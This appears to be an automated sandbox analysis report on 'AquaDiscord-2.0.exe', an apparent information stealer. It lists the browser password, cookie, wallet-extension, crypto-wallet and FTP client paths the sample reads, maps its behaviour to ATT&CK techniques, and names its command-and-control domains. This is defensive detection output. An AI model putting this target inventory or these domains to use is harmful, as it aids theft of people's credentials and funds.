                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
                Source: Yara matchFile source: 00000002.00000003.1737933383.0000000002E4E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1747045883.0000000002E4F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1737540016.0000000002E4B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: AquaDiscord-2.0.exe PID: 7400, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: Process Memory Space: AquaDiscord-2.0.exe PID: 7400, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                Windows Management Instrumentation
                1
                DLL Side-Loading
                211
                Process Injection
                21
                Virtualization/Sandbox Evasion
                2
                OS Credential Dumping
                1
                System Time Discovery
                Remote Services1
                Screen Capture
                21
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                PowerShell
                Boot or Logon Initialization Scripts1
                DLL Side-Loading
                211
                Process Injection
                LSASS Memory1
                Query Registry
                Remote Desktop Protocol1
                Archive Collected Data
                2
                Non-Application Layer Protocol
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Deobfuscate/Decode Files or Information
                Security Account Manager241
                Security Software Discovery
                SMB/Windows Admin Shares41
                Data from Local System
                113
                Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
                Obfuscated Files or Information
                NTDS21
                Virtualization/Sandbox Evasion
                Distributed Component Object Model3
                Clipboard Data
                Protocol ImpersonationTraffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Software Packing
                LSA Secrets1
                Process Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading
                Cached Domain Credentials1
                Application Window Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync11
                File and Directory Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem33
                System Information Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                AquaDiscord-2.0.exe32%ReversingLabsWin32.Trojan.Generic
                AquaDiscord-2.0.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://fancywaxxers.shop/$100%Avira URL Cloudmalware
                https://fancywaxxers.shop:443/apitxtPK100%Avira URL Cloudmalware
                https://fancywaxxers.shop/apif100%Avira URL Cloudmalware
                https://fancywaxxers.shop/apik100%Avira URL Cloudmalware
                https://fancywaxxers.shop:443/apiu100%Avira URL Cloudmalware
                https://fancywaxxers.shop:443/api100%Avira URL Cloudmalware
                https://fancywaxxers.shop/api100%Avira URL Cloudmalware
                https://fancywaxxers.shop:443/apiR100%Avira URL Cloudmalware
                fancywaxxers.shop100%Avira URL Cloudmalware
                https://fancywaxxers.shop/L100%Avira URL Cloudmalware
                https://fancywaxxers.shop:443/api7100%Avira URL Cloudmalware
                https://fancywaxxers.shop:443/api?100%Avira URL Cloudmalware
                https://fancywaxxers.shop/100%Avira URL Cloudmalware
                https://fancywaxxers.shop/api~J100%Avira URL Cloudmalware
                NameIPActiveMaliciousAntivirus DetectionReputation
                fancywaxxers.shop
                104.21.16.1
                truefalse
                  high
                  NameMaliciousAntivirus DetectionReputation
                  fancywaxxers.shoptrue
                  • Avira URL Cloud: malware
                  unknown
                  rabidcowse.shopfalse
                    high
                    wholersorie.shopfalse
                      high
                      cloudewahsj.shopfalse
                        high
                        noisycuttej.shopfalse
                          high
                          nearycrepso.shopfalse
                            high
                            https://fancywaxxers.shop/apitrue
                            • Avira URL Cloud: malware
                            unknown
                            framekgirus.shopfalse
                              high
                              tirepublicerj.shopfalse
                                high
                                abruptyopsn.shopfalse
                                  high
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://duckduckgo.com/chrome_newtabAquaDiscord-2.0.exe, 00000002.00000003.1693667691.000000000543D000.00000004.00000800.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.1693765440.000000000543A000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://duckduckgo.com/ac/?q=AquaDiscord-2.0.exe, 00000002.00000003.1693667691.000000000543D000.00000004.00000800.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.1693765440.000000000543A000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://fancywaxxers.shop/apifAquaDiscord-2.0.exe, 00000002.00000002.2910002831.0000000002E54000.00000004.00000020.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.2401772119.0000000002E4F000.00000004.00000020.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.2402042694.0000000002E52000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      unknown
                                      https://fancywaxxers.shop/apikAquaDiscord-2.0.exe, 00000002.00000003.1747045883.0000000002E63000.00000004.00000020.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.1747284346.0000000002E63000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      unknown
                                      https://fancywaxxers.shop/$AquaDiscord-2.0.exe, 00000002.00000003.2402019988.0000000002E56000.00000004.00000020.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.1751206629.0000000002E63000.00000004.00000020.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.1750932268.0000000002E63000.00000004.00000020.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.1747045883.0000000002E63000.00000004.00000020.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.1747284346.0000000002E63000.00000004.00000020.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.2401772119.0000000002E4F000.00000004.00000020.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.2402077657.0000000002E5E000.00000004.00000020.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000002.2910034398.0000000002E5F000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      unknown
                                      https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.AquaDiscord-2.0.exe, 00000002.00000003.1723179894.00000000053FF000.00000004.00000800.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.1723197231.0000000005404000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=AquaDiscord-2.0.exe, 00000002.00000003.1693667691.000000000543D000.00000004.00000800.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.1693765440.000000000543A000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17AquaDiscord-2.0.exe, 00000002.00000003.1709004731.0000000005449000.00000004.00000800.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.1694093363.0000000005450000.00000004.00000800.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.1709186168.0000000005449000.00000004.00000800.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.1694160465.0000000005449000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://fancywaxxers.shop:443/apiuAquaDiscord-2.0.exe, 00000002.00000002.2909842558.0000000002DD6000.00000004.00000020.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.1791621621.0000000002DD3000.00000004.00000020.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.2401885385.0000000002DD4000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: malware
                                            unknown
                                            https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYiAquaDiscord-2.0.exe, 00000002.00000003.1723197231.0000000005404000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://x1.c.lencr.org/0AquaDiscord-2.0.exe, 00000002.00000003.1721976712.0000000005428000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://x1.i.lencr.org/0AquaDiscord-2.0.exe, 00000002.00000003.1721976712.0000000005428000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallAquaDiscord-2.0.exe, 00000002.00000003.1694160465.0000000005424000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchAquaDiscord-2.0.exe, 00000002.00000003.1693667691.000000000543D000.00000004.00000800.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.1693765440.000000000543A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://fancywaxxers.shop:443/apitxtPKAquaDiscord-2.0.exe, 00000002.00000002.2909842558.0000000002DD6000.00000004.00000020.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.1747187894.0000000002DD3000.00000004.00000020.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.1791621621.0000000002DD3000.00000004.00000020.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.2401885385.0000000002DD4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      https://support.mozilla.org/products/firefoxgro.allAquaDiscord-2.0.exe, 00000002.00000003.1722843066.000000000551A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://fancywaxxers.shop:443/apiAquaDiscord-2.0.exe, 00000002.00000003.1737584566.0000000002DD3000.00000004.00000020.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000002.2909842558.0000000002DD6000.00000004.00000020.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.1747187894.0000000002DD3000.00000004.00000020.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.1791621621.0000000002DD3000.00000004.00000020.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.2401885385.0000000002DD4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: malware
                                                        unknown
